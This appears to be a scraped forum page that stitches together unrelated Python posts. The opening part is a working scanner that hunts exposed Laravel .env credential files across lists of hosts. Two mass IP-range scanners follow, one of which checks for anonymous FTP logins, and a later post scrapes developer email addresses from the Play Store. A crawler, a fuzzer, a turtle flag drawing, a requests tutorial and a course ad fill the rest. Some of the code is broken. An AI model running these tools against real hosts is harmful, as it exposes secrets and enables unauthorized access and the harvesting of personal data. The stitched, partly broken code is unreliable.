"/tools/.env", "/Travel_form/.env", "/ts/prime/.env", "/ubuntu/.env", "/ui/.env", 
"/unixtime/.env", "/unsplash-downloader/.env", "/upfiles/.env", "/upload/.env", "/uploads/.env", "/urlmem-app/.env", "/User_info/.env", "/v1/.env", "/v2/.env", "/var/backup/.env", "/vendor/.env", "/vendor/github.com/gobuffalo/envy/.env", "/vendor/github.com/subosito/gotenv/.env", "/videos/.env", "/vm-docker-compose/.env", "/vod_installer/.env", "/vue_CRM/.env", "/vue-end/vue-til/.env", "/vue/vuecli/.env", "/web-dist/.env", "/web/.env", "/Web/siteMariage/.env", "/webroot_path/.env", "/websocket/.env", "/webstatic/.env", "/webui/.env", "/well-known/.env", "/whturk/.env", "/windows/tests/9.2.x/.env", "/windows/tests/9.3.x/.env", "/wp-content/.env", "/www-data/.env", "/www/.env", "/xx-final/vue-heroes/.env", "/zmusic-frontend/.env"], "marks" : ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] laravel:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) class main(): """ Main part which controls the complete program """ def __init__(self, file, timeout = 10): self.file = read_file_ip(file) global scan scan = scan(timeout) def run(self, threads): threads = int(threads) print "\n" print "[INFO] Scanning with %s Thread(s)\n" %threads while True: line = self.file.next_line() if line == False: break while True: if threading.active_count() <= threads: ip_port = line.split(":") if(re.match("((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)",ip_port[0]) != None): ip = ip_port[0] port = ip_port[1].split(" ")[0] t = threading.Thread(target=scan.check, args=(ip, port)) t.deamon = False t.start() break else: break return True if __name__ == "__main__": __version__ = "by FXP-T Team - www.fxp-terminal.info" def help(): print "--------------------------------------------------------------------" print " Schm3ckm0-Ch3ck3R v0.5 " print "- .py <file> results.txt <threads> [timeout] " print "-- *** " print "- Respect to: " print " " print "- ddr, b2r, bwc, il, maro, burnz, chucky, " print "- gil, bebop, Gnu, airy, fake, " print "- dodo, mani, Buster and all i foget :D " print "-- *** " print "- " print "- Respect to: " print "- FXP-T Team, [email protected]@R-LightS and Friends, moep, izibitzi, Stylez " print " " print " < Changelog > " print " " print " " print " " print " " print " 28.01.2021 - SSLError Fix , True, False and None , durch getestet " print "-18.01.2021 - diverse path erweiterungen------------------------- " print "-18.01.2021 - module_scan_laravel_and_phpunit hinzugefügt-------- " print "-01.10.2020 - Adminer modul hinzugefügt-------------------------- " print " 03.10.2020 - Scan module erweitert------------------------------ " print " 28.02.2020 - Bug Fixes, Brute Module eing...-------------------- " print " 01.10.2020 - Bug Fixes und kleib tests durchgefürt " print "--------------------------------------------------------------------" if len(sys.argv) == 3: main = main(sys.argv[1]) main.run(sys.argv[2]) elif len(sys.argv) == 4: main = 
main(sys.argv[1], timeout = sys.argv[3]) main.run(sys.argv[2]) else: help()
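The checker above is written for Python 2 (print statements without parentheses) and relies on the author's own tools() helpers. As a rough illustration of the same idea in Python 3, here is a minimal sketch of my own (not the original tool) that probes a few of the listed .env paths and looks for the module's Laravel marker strings; the requests library, the shortened path list, and the hard-coded example target are my assumptions, not part of the original script.

#!/usr/bin/env python3
# Minimal sketch, not the original tool: probe a few .env paths and grep for Laravel markers.
import requests

PATHS = ["/.env", "/app/.env", "/laravel/.env", "/public/.env"]   # tiny sample of the path list above
MARKS = ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"]  # marker strings from the original module

def scan_host(ip, port, timeout=10):
    base = "http://%s:%s" % (ip, port)
    for path in PATHS:
        url = base + path
        try:
            r = requests.get(url, timeout=timeout)
        except requests.exceptions.RequestException:
            print("[-] Host down or unreachable:", base)
            return
        if r.status_code == 200 and any(mark in r.text for mark in MARKS):
            print("[*] laravel:", url)
            with open("log_laravel.txt", "a") as log:   # same log file name as the original module
                log.write(url + "\n")

if __name__ == "__main__":
    scan_host("127.0.0.1", 80)   # example target only; replace with a host you are authorized to test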
  4. """ Port-/FTP-Scanner """ import socket import threading import sys import time import argparse def CheckIfOpen(ip,port): target = (ip,int(port)) try: socket.create_connection(target,1.5) open('open','a').write(ip+":"+str(port)+"\n") print("Port: "+str(port)+" open on IP: "+ip+"!\n") except: print("Port: "+str(port)+" closed on IP: "+ip+"!\n") def CheckIfPub(target): try: server = (target,21) user = "USER anonymous\r\n" pwd = "PASS anonymous\r\n" sock = socket.socket() sock.connect(server) sock.recv(4096) sock.sendall(user.encode()) if "331" in sock.recv(4096).decode('utf-8'): sock.sendall(pwd.encode()) answer = sock.recv(4096).decode('utf-8') if "230" in answer: open('found_ftp','a').write(target+":21 anonymous:anonymous\n") sock.recv(4096) sock.close() elif "530" in answer: sock.close() else: sock.close() except: print("Login failed!\n") pass parser = argparse.ArgumentParser() parser.add_argument("scan", type=str,choices=["ftp","port"],help="decide whether to scan for pubs or ports.") parser.add_argument("ranges",type=str,help="specify the file containing the ranges to scan, format: 123.123.123.123 123.123.123.123") parser.add_argument("-t","--threads",type=int,help="specify amount of threads, else the default will be 100.") parser.add_argument("-p","--ports",type=str,help="specify the port or ports to scan if you decided to scan for open ports. format: port1,port2,port3,...") args = parser.parse_args() if args.threads: threads = args.threads else: threads = 100 ranges = open(args.ranges).read().splitlines() for ipranges in ranges: chain = ipranges.split(" ") start = chain[0].split(".") end = chain[1].split(".") if int(end[3]) != 255: end[3] = int(end[3])+1 else: if int(end[2]) != 255: end[2] = int(end[2])+1 end[3] = 0 else: if int(end[1]) != 255: end[1] = int(end[1])+1 end[2] = 0 end[3] = 0 else: if int(end[0]) != 255: end[0] = int(end[0])+1 end[1] = 0 end[2] = 0 end[3] = 0 end = str(end[0])+"."+str(end[1])+"."+str(end[2])+"."+str(end[3]) current = str(start[0])+"."+str(start[1])+"."+str(start[2])+"."+str(start[3]) if args.scan == "port": try: ports = args.ports.split(",") except: ports = args.ports elif args.scan == "pub": ports = 21 while(current != end): for port in ports: if threading.active_count() <= threads: if args.scan == "port": T = threading.Thread(target=CheckIfOpen,args=(current,int(port),)) elif args.scan == "ftp": T = threading.Thread(target=CheckIfPub,args=(current,)) T.start() else: time.sleep(0.2) if args.scan == "port": T = threading.Thread(target=CheckIfOpen,args=(current,int(port),)) elif args.scan == "ftp": T = threading.Thread(target=CheckIfPub,args=(current,)) T.start() progress = current.split(".") if int(progress[3]) != 255: progress[3] = int(progress[3])+1 else: if int(progress[2]) != 255: progress[2] = int(progress[2])+1 progress[3] = 0 else: if int(end[1]) != 255: progress[1] = int(progress[1])+1 progress[2] = 0 progress[3] = 0 else: if int(progress[0]) != 255: progress[0] = int(progress[0])+1 progress[1] = 0 progress[2] = 0 progress[3] = 0 current = str(progress[0])+"."+str(progress[1])+"."+str(progress[2])+"."+str(progress[3]) open('current_ip','w').write(current) T.join() print("Scan finished!\n") exit()
  5. #!/usr/bin/python import time, socket, struct, threading, sys class file(): def __init__(self, file): self.file = open(file, "r") def next_line(self): try: next_line = self.file.next().rstrip() except StopIteration: next_line = False self.act_line = next_line return self.act_line def actual_line(self): return self.act_line class class_tools(): def __init__(self): pass def init_iprange(self, start, end): """ Init iprange, must be called before iprange_nextip! """ self.var_iprange_start = start self.var_iprange_end = end self.var_iprange_now = None def iprange_nextip(self): """ Calc next ip for range defined wiht init_iprange. If Range is finished it returns False. """ if self.var_iprange_now == None: self.var_iprange_now = self.var_iprange_start elif self.var_iprange_now != self.var_iprange_end: self.var_iprange_now = self.ip2nextip(self.var_iprange_now) else: return False return self.var_iprange_now def ip2nextip(self, ip): """ Calc next the next ip """ long_ip = self.ip2long(ip) long_ip += 1 next_ip = self.long2ip(long_ip) return next_ip def ip2long(self, ip): """ Convert ip to a long """ packed = socket.inet_aton(ip) return struct.unpack("!L", packed)[0] def long2ip(self, n): """ Convert a long to ip """ unpacked = struct.pack('!L', n) return socket.inet_ntoa(unpacked) def ipportopen(self, host, port, timeout = 10): """ Check if a port is open and return true or false """ s = socket.socket() s.settimeout(timeout) try: s.connect((host, port)) except socket.error as e: e = str(e) return [False, e] return [True] def logging(self, file, value): """ Append value to file """ log_file = open(file, "a") log_file.write(value+"\r\n") log_file.close() def range_line_struct(self, line): """ structure/parse a range line """ tmp_line = line.split(" ") # To do: # - add regex to match if valid ip if len(tmp_line) != 2: return False else: return [tmp_line[0], tmp_line[1]] def createDaemon(): try: # Fork a child process so the parent can exit. This returns control to # the command-line or shell. It also guarantees that the child will not # be a process group leader, since the child receives a new process ID # and inherits the parent's process group ID. This step is required # to insure that the next call to os.setsid is successful. pid = os.fork() except OSError as e: raise Exception("%s [%d]" % (e.strerror, e.errno)) if (pid == 0): # The first child. # To become the session leader of this new session and the process group # leader of the new process group, we call os.setsid(). The process is # also guaranteed not to have a controlling terminal. os.setsid() # Is ignoring SIGHUP necessary? # # It's often suggested that the SIGHUP signal should be ignored before # the second fork to avoid premature termination of the process. The # reason is that when the first child terminates, all processes, e.g. # the second child, in the orphaned group will be sent a SIGHUP. # # "However, as part of the session management system, there are exactly # two cases where SIGHUP is sent on the death of a process: # # 1) When the process that dies is the session leader of a session that # is attached to a terminal device, SIGHUP is sent to all processes # in the foreground process group of that terminal device. # 2) When the death of a process causes a process group to become # orphaned, and one or more processes in the orphaned group are # stopped, then SIGHUP and SIGCONT are sent to all members of the # orphaned group." 
[2] # # The first case can be ignored since the child is guaranteed not to have # a controlling terminal. The second case isn't so easy to dismiss. # The process group is orphaned when the first child terminates and # POSIX.1 requires that every STOPPED process in an orphaned process # group be sent a SIGHUP signal followed by a SIGCONT signal. Since the # second child is not STOPPED though, we can safely forego ignoring the # SIGHUP signal. In any case, there are no ill-effects if it is ignored. # # import signal # Set handlers for asynchronous events. # signal.signal(signal.SIGHUP, signal.SIG_IGN) try: # Fork a second child and exit immediately to prevent zombies. This # causes the second child process to be orphaned, making the init # process responsible for its cleanup. And, since the first child is # a session leader without a controlling terminal, it's possible for # it to acquire one by opening a terminal in the future (System V- # based systems). This second fork guarantees that the child is no # longer a session leader, preventing the daemon from ever acquiring # a controlling terminal. pid = os.fork() # Fork a second child. except OSError as e: raise Exception("%s [%d]" % (e.strerror, e.errno)) if (pid == 0): # The second child. # Since the current working directory may be a mounted filesystem, we # avoid the issue of not being able to unmount the filesystem at # shutdown time by changing it to the root directory. # os.chdir(WORKDIR) EDIT by Whyned: Not important for me ;) # We probably don't want the file mode creation mask inherited from # the parent, so we give the child complete control over permissions. #os.umask(UMASK) EDIT by Whyned: Not important for me ;) pass else: # exit() or _exit()? See below. os._exit(0) # Exit parent (the first child) of the second child. else: # exit() or _exit()? # _exit is like exit(), but it doesn't call any functions registered # with atexit (and on_exit) or any registered signal handlers. It also # closes any open file descriptors. Using exit() may cause all stdio # streams to be flushed twice and any temporary files may be unexpectedly # removed. It's therefore recommended that child branches of a fork() # and the parent branch(es) of a daemon use _exit(). os._exit(0) # Exit parent of the first child. def func_help(): print((""" :: pyRangeScanner v%s :: With this Tool you can scan a range for (multiple) open port(s) It can handle a single range or a file with multiple ranges and it supports threads. :: HELP :: .py -r range_start range_end ports threads [timeout] .py -rf range_file ports threads [timeout] ports = 80 or for multiple ports 80,8080,81... Default Timeout = %s :: EXAMPLE :: .py -r 127.0.0.0 127.0.1.0 80,8080,22 20 10 .py -rf xyz.txt 80,8080,22 20 10 :: EXAMPLE RANGE FILE :: 127.0.0.0 127.0.1.0 125.1.1.0 125.2.0.0 ... :: GREETS :: Greets fly out to: Team DDR, Team WTC, BWC, Inferno-Load, B2R, Datenreiter, Burnz, Gil, LeChuck, Bebop, Fr0sty, Gnu, Airy, FaKe, Generation, Shizuko, leety and all i forget! 
""" %(__info__['version'], __info__['def_timeout']))) def func_portcheck(ip, port, timeout): """ Handle return from tools.ipportopen and log to file """ log_result = "result.txt" log_failure = "log.txt" tmp_ip = tools.ipportopen(ip, port, timeout) sys.stdout.write("[*] Checking: %s %s\n" %(ip, port)) if tmp_ip[0] != False: sys.stdout.write("[+] %s Port %s Open!\n" %(ip, port)) tools.logging(log_result, "%s:%s" %(ip, port)) elif tmp_ip[0] == False: sys.stdout.write("[-] %s Port %s %s\n" %(ip,port, tmp_ip[1])) tools.logging(log_failure, "%s:%s %s" %(ip, port, tmp_ip[1])) def func_portcheckv1(ip, port, timeout): """ Handle return from tools.ipportopen and log to file port must be array! """ log_result = "result.txt" log_failure = "log.txt" timeout = int(timeout) for tmp_port in port: tmp_port = int(tmp_port) tmp_ip = tools.ipportopen(ip, tmp_port, timeout) sys.stdout.write("[*] Checking: %s %s\n" %(ip, tmp_port)) if tmp_ip[0] != False: sys.stdout.write("[+] %s Port %s Open!\n" %(ip, tmp_port)) tools.logging(log_result, "%s:%s" %(ip, tmp_port)) elif tmp_ip[0] == False: sys.stdout.write("[-] %s Port %s %s\n" %(ip, tmp_port, tmp_ip[1])) tools.logging(log_failure, "%s:%s %s" %(ip, tmp_port, tmp_ip[1])) if tmp_ip[0] == False and tmp_ip[1] == "timed out" or tmp_ip[0] == False and tmp_ip[1] == "[Errno 101] Network is unreachable": # Delete this if you want to check all ports sys.stdout.write("[-] Skipping other Ports from %s" %(ip)) break def main1(range_start, range_end, port, timeout): """ Check a Range for open port (single threaded) """ tools.init_iprange(range_start, range_end) while True: next_ip = tools.iprange_nextip() if next_ip != False: print(next_ip) print((tools.ipportopen(next_ip, port, timeout = timeout))) else: break def main2(range_start, range_end, port, timeout, threads): """ Check a Range for open port (multi threaded) """ tools.init_iprange(range_start, range_end) while True: if threading.active_count() < threads: next_ip = tools.iprange_nextip() if next_ip != False: thread = threading.Thread(target=func_portcheck, args=(next_ip, port, timeout,)) thread.start() else: break while threading.active_count() != 1: #Wait until all threads are finished. time.sleep(0.1) def main2v1(range_start, range_end, port, timeout, threads): """ Check a Range for open port(s) (multi threaded) port argument must be array! """ threads = int(threads) tools.init_iprange(range_start, range_end) while True: if threading.active_count() <= threads: print((threading.active_count(), threads)) next_ip = tools.iprange_nextip() if next_ip != False: thread = threading.Thread(target=func_portcheckv1, args=(next_ip, port, timeout,)) thread.start() else: break while threading.active_count() > 2: #Wait until all threads are finished. time.sleep(0.1) def main3(range_file, port, timeout, threads): """ Check Ranges from Range file for open port """ range_file = file(range_file) while True: #Read range_file line per line line = range_file.next_line() if line == False: break line_split = tools.range_line_struct(line) main2(line_split[0], line_split[1], port, timeout, threads) def main3v1(range_file, port, timeout, threads): """ Check Ranges from Range file for multiple open ports port must be array! 
""" range_file = file(range_file) while True: #Read range_file line per line line = range_file.next_line() if line == False: break line_split = tools.range_line_struct(line) main2v1(line_split[0], line_split[1], port, timeout, threads) if __name__ == "__main__": global tools, __info__ __info__ = {} __info__['version'] = "0.1" __info__['def_timeout'] = 10 tools = class_tools() #main1("173.194.35.151", "173.194.35.160", 80, 2) #main2("173.194.35.151", "173.194.35.160", 81, 2, 10) #main3("/tmp/test.txt", 80, 2, 10) #main2v1("192.168.178.0", "192.168.179.0", [81, 80], 2, 10) #main3v1("/tmp/test.txt", [80, 8080, 21], 2, 20) print((len(sys.argv),sys.argv)) if len(sys.argv) >= 5: if sys.argv[1] == "-rf": if len(sys.argv) == 6: # Use range_file and timeout # .py -rf rangefile port,port,port threads timeout range_file = sys.argv[2] port = sys.argv[3].split(",") threads = int(sys.argv[4])+1 timeout = sys.argv[5] main3v1(range_file, port, timeout, threads) elif len(sys.argv) == 5: # Use range_file and no timeout # .py -rf rangefile port,port,port threads (timeout = default = 10) range_file = sys.argv[2] port = sys.argv[3].split(",") threads = int(sys.argv[4])+1 timeout = __info__['def_timeout'] main3v1(range_file, port, timeout, threads) else: func_help() elif sys.argv[1] == "-r": if len(sys.argv) == 7: # Use a single range and timeout # .py -r range_start range_end port,port,port threads timeout range_start = sys.argv[2] range_end = sys.argv[3] port = sys.argv[4].split(",") threads = int(sys.argv[5])+1 timeout = sys.argv[6] main2v1(range_start, range_end, port, timeout, threads) elif len(sys.argv) == 6: # Use a single range and no timeout # .py -r range_start range_end port,port,port threads range_start = sys.argv[2] range_end = sys.argv[3] port = sys.argv[4].split(",") threads = int(sys.argv[5])+1 timeout = __info__['def_timeout'] main2v1(range_start, range_end, port, timeout, threads) else: func_help() else: func_help() else: func_help()
  6. Hey guys! I am Venom! I hope you are all doing fine. Today I am sharing a web crawler script written in Python 3, so let's begin!

import requests                   # requests library for fetching the page source
import re                         # re module for extracting href values
from urllib.parse import urljoin  # urljoin to resolve relative links against the current page
from bs4 import BeautifulSoup     # bs4 to parse the HTML

target_links = []  # stores every unique URL we have already crawled

target = input("[+] Enter the url: ")  # taking the target URL as user input

def extract(tar):  # fetch a page and return all href values found in it
    try:           # try/except in case we get a connection or HTTP error
        response = requests.get(tar)  # get the page content (fixed: use the argument, not the global target)
        soup = BeautifulSoup(response.content, 'html.parser')  # parse the content
        return re.findall('(?:href=")(.*?)"', str(soup))       # find URLs with a regex pattern
    except requests.exceptions.RequestException:
        return []  # on any request error just return no links (the original passed, leaving the caller with None)

def crawl(path):          # crawl every link found on the given page
    links = extract(path) # all the links found on the current page
    for link in links:    # format the URLs and crawl them again one by one
        url = urljoin(path, link)     # if the URL is relative, join it with the current page
        if "#" in url:
            url = url.split("#")[0]   # drop the fragment so the same page is not crawled twice
        if link in url and url not in target_links:  # only follow in-scope URLs we have not seen yet
            target_links.append(url)  # remember the URL so it is not crawled again
            print("[+] " + url)       # print the URL we just found
            crawl(url)                # crawl the newly found URL as well

crawl(target)  # start crawling from the target URL
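One thing to keep in mind: the recursive crawl() can hit Python's recursion limit on large sites. A minimal iterative variant of my own (not part of the original script) that uses a queue and a visited set behaves the same way without deep recursion:

# Sketch of my own: same extract() helper as above, but a queue instead of recursion.
from collections import deque
from urllib.parse import urljoin

def crawl_iterative(start_url):
    visited = set()
    queue = deque([start_url])
    while queue:
        page = queue.popleft()
        for link in extract(page):                    # reuse the extract() function defined above
            url = urljoin(page, link).split("#")[0]   # resolve the link and drop any fragment
            if url.startswith(start_url) and url not in visited:
                visited.add(url)
                print("[+] " + url)
                queue.append(url)                     # crawl it later instead of recursing now
    return visited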
  7. Credit for this project goes to @AS Hacker; I am posting on his behalf. In this Python code, with the help of turtle graphics, we will draw the national flag of India. 🙏 It's a short, crisp project, and I hope you learn something new from it. So let's roll. Here is the source code with explanations, so enjoy reading.

import turtle
from turtle import *

# screen for output
screen = turtle.Screen()

# defining a turtle instance
t = turtle.Turtle()
t.speed(10)

# initially pen up, move to the top-left corner of the flag
t.penup()
t.goto(-400, 250)
t.pendown()

# Orange rectangle
t.color("orange")
t.begin_fill()
t.forward(800)
t.right(90)
t.forward(167)
t.right(90)
t.forward(800)
t.end_fill()
t.left(90)
t.forward(167)

# Green rectangle
t.color("green")
t.begin_fill()
t.forward(167)
t.left(90)
t.forward(800)
t.left(90)
t.forward(167)
t.end_fill()

# Big blue circle
t.penup()
t.goto(70, 0)
t.pendown()
t.color("navy")
t.begin_fill()
t.circle(70)
t.end_fill()

# Big white circle
t.penup()
t.goto(60, 0)
t.pendown()
t.color("white")
t.begin_fill()
t.circle(60)
t.end_fill()

# Mini blue circles
t.penup()
t.goto(-57, -8)
t.pendown()
t.color("navy")
for i in range(24):
    t.begin_fill()
    t.circle(3)
    t.end_fill()
    t.penup()
    t.forward(15)
    t.right(15)
    t.pendown()

# Small blue circle
t.penup()
t.goto(20, 0)
t.pendown()
t.begin_fill()
t.circle(20)
t.end_fill()

# Spokes
t.penup()
t.goto(0, 0)
t.pendown()
t.pensize(2)
for i in range(24):
    t.forward(60)
    t.backward(60)
    t.left(15)

# to hold the output window
turtle.done()

output-flag_FHroUYa7.mp4
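If you want to shorten the two rectangle sections, the fill pattern can be wrapped in a small helper. This is my own refactor suggestion, not part of @AS Hacker's original code:

# Optional helper (my own sketch): draw a filled, axis-aligned rectangle with any turtle.
def draw_rect(t, width, height, fill):
    t.color(fill)
    t.begin_fill()
    for _ in range(2):
        t.forward(width)
        t.right(90)
        t.forward(height)
        t.right(90)
    t.end_fill()

# Example: the saffron band of the flag.
# t.penup(); t.goto(-400, 250); t.pendown()
# draw_rect(t, 800, 167, "orange")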
  8. Hey guys! I am Venom! Today I am going to share some basic methods and functions of the requests library. If you want to know more about it, please do comment and let me know! 🙂

import requests  # importing the library

url = "https://forum.shellcrew.org"
headers = {"host": "forum.shellcrew.org",
           "origin": "shellcrew.org",
           "referer": "venomgrills.com",
           "Cookies": "somerandomcookies",
           "Accept": "application/json",
           "Content-Type": "application/json"}
data = {"username": "admin", "password": "admin"}
auth = ("venom", "fuck0ff")  # basic-auth credentials (requests expects a (user, password) tuple, not a dict)

response = requests.get(url)                                          # make a GET request (you can use any URL, e.g. https://venomgrills.com)
response = requests.get(url, auth=auth)                               # GET request with basic authentication
response = requests.get(url, headers=headers)                         # GET request with custom headers
response = requests.get(url, headers=headers, allow_redirects=True)   # GET request that follows redirects
response = requests.post(url, headers=headers, data=data)             # POST request with data and headers
response = requests.put(url, headers=headers, data=data)              # PUT request with data and headers
response = requests.get(url, timeout=0.5)                             # GET request with a timeout (time is in seconds)

statusCode = response.status_code  # status code of the response
header = response.headers          # headers of the response
cookies = response.cookies         # cookies of the response
history = response.history         # redirect history of the response
encoding = response.encoding       # encoding of the response
content = response.content         # raw body of the response, including HTML tags, tabs etc.

# Errors and exceptions in the requests library
try:
    response = requests.get(url)
except requests.exceptions.ConnectionError:
    print("Connection error")  # raised when the website is down or unreachable

try:
    response = requests.get(url)
except requests.exceptions.SSLError:
    print("The website has an invalid or expired SSL certificate!")

try:
    response = requests.get(url)
except requests.exceptions.InvalidHeader:
    print("Invalid header given (*_*)")

# If you want more detailed info about the requests library, please comment down below for the second part!! :)
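One addition worth knowing about: if you send many requests to the same host, a requests.Session reuses the underlying connection and keeps headers and cookies between calls. A short sketch of my own, using the same forum URL from above purely as a placeholder:

import requests

session = requests.Session()                              # one session, one connection pool
session.headers.update({"Accept": "application/json"})    # headers set here apply to every request below

response = session.get("https://forum.shellcrew.org")     # cookies from this response are stored in the session...
response = session.get("https://forum.shellcrew.org")     # ...and sent automatically on later calls

print(response.status_code, session.cookies.get_dict())   # status code and the accumulated cookie jar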
  9. ABOUT THE SERIES

This is the first video and series by Pentest With Rohit on bug bounty. The series demonstrates hands-on automation with Python for each topic mentioned in the video. It gives you a basic idea of how to automate repetitive tasks and perform OSINT and reconnaissance in an automated way. It also gives you an overview of Python programming in the Python crash course section, because basic Python knowledge will be needed.

WHY DO WE NEED AUTOMATION?

Repetitive manual work wastes our time and energy and can exhaust you. Automating these repetitive tasks saves that time and energy so we can focus on other areas.

WHY PYTHON?

Python is very easy to learn for newcomers and beginners. Its simplified syntax means anybody can easily read and understand the code, and there are lots of tools and modules available for Python that let us get tasks done with just a few lines of code. That is why I have chosen Python for this series.

To know more about this series, just Click Here to watch.
  10. Hello friends! I am Venom (Gaurav), founder of Venomgrills and a mod at Shell_Crew. Let's look at a cool Python script developed by me; I hope you guys enjoy it and learn something from it, so let's go.

# Importing libraries
import requests                # requests library for making GET requests for the web pages
from bs4 import BeautifulSoup  # to parse the HTML and read the content from tags and attributes
import re                      # regex to find email addresses, if any, in the parsed data

emailList = []  # list to collect the emails we get from the store pages
x = 0           # integer index into emailList; used below to skip duplicate copies of each email

# this is the regular expression for the email format
emailRegex = r"""(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"""

query = input("Enter your query: ")  # taking any search term as input, e.g. food apps or gaming apps
url = "https://play.google.com/store/search?q=" + query + "&c=apps"  # Play Store search URL for our query

# this is the scraping part where we collect the app links from the search results page
response = requests.get(url).content           # GET request to get the source code of the results page
soup = BeautifulSoup(response, 'html.parser')  # parse the content of the response with the HTML parser

for links in soup.findAll("a", class_="JC71ub"):   # every <a> tag with class "JC71ub" holds an app link
    link = links.get("href")                       # grabbing the link from the href attribute
    finalLink = "https://play.google.com" + link   # final link = Play Store base URL + app path from the href above
    response = requests.get(finalLink).content     # GET request to fetch the content of the app page
    soup = BeautifulSoup(response, 'html.parser')  # again parsing the HTML content with the HTML parser
    for emails in re.finditer(emailRegex, str(soup)):  # using re to find the email pattern in the page source
        email = emails.group()                     # the matched email as a string
        emailList.append(email)                    # add it to emailList defined above
    if x < len(emailList):                         # guard added so pages without any email do not crash the loop
        print(emailList[x])                        # print the email found on this page, using x as the index
        output = open("emails.txt", 'a')           # open emails.txt in append mode to store the output
        output.write(emailList[x] + "\n")          # write the email to the text file
        output.close()                             # close the file to save the output
        x += 3  # each email appears about three times per page, so we skip three entries to avoid duplicate prints

playstore_python.mp4
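The x += 3 trick only works when every page repeats each address exactly the same number of times. A more robust way to avoid duplicates is to collect the matches in a set; here is a small sketch of my own (not from the original post) that reuses the emailRegex defined above:

# Sketch: deduplicate with a set instead of indexing by threes (reuses emailRegex from above).
import re

seen_emails = set()  # everything we have already written out

def extract_new_emails(page_source):
    """Return only the addresses in page_source that have not been seen before."""
    found = {m.group() for m in re.finditer(emailRegex, page_source)}
    new = found - seen_emails
    seen_emails.update(new)
    return new

# Example inside the app loop:
# for email in extract_new_emails(str(soup)):
#     print(email)
#     with open("emails.txt", "a") as output:
#         output.write(email + "\n")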
  11. Hi guys, I am Venom! Today we will look at a short Python 3 script for a web fuzzer. I hope you learn something new from it, so let's roll.

# importing libraries
import requests  # for making requests to the website
import os        # for checking that the wordlist path exists

url = input('Enter the url: ')                 # taking the URL as user input
wordlist = input('Enter the wordlist path: ')  # taking the wordlist path as user input

# checking whether the wordlist exists
if os.path.exists(wordlist) is False:
    print("Wordlist not found! Please try again!")  # the wordlist does not exist
else:
    print("Wordlist Found: True!")  # the wordlist exists, so run the fuzzer
    op = open(wordlist, 'r')        # open the wordlist file
    read = op.readlines()           # read every line of the file
    for path in read:               # loop over each line of the wordlist
        finalurl = url + "/" + path.strip()  # append the path to the target URL (strip() removes the trailing newline)
        response = requests.get(finalurl)    # GET request to get the status code of the page
        if response.status_code == 200 or response.status_code == 403:  # check for interesting status codes
            print(finalurl + " [" + str(response.status_code) + "]")    # print the final URL with its status code
        else:
            pass  # ignore everything else

fuzzer_2-Veed.mp4
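Since every path is checked independently, the loop above parallelizes nicely. A minimal sketch of my own using concurrent.futures, assuming the same url and wordlist inputs as above (the worker count and timeout are arbitrary choices):

# Sketch: the same check as above, but run with a thread pool for speed.
from concurrent.futures import ThreadPoolExecutor
import requests

def check(path):
    finalurl = url + "/" + path.strip()
    try:
        response = requests.get(finalurl, timeout=5)
    except requests.exceptions.RequestException:
        return  # skip paths that error out
    if response.status_code in (200, 403):
        print(finalurl + " [" + str(response.status_code) + "]")

with open(wordlist) as op, ThreadPoolExecutor(max_workers=20) as pool:
    pool.map(check, op.readlines())  # the pool waits for all checks to finish before exiting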
  12. Machine learning Bootcamp for Beginners 2021: Introduction 🧩 Apply coupon "2021HOTSKILLS" on checkout to get this course for FREE Get it Here: https://www.learnmall.in/course/introduction-to-machine-learning-algorithms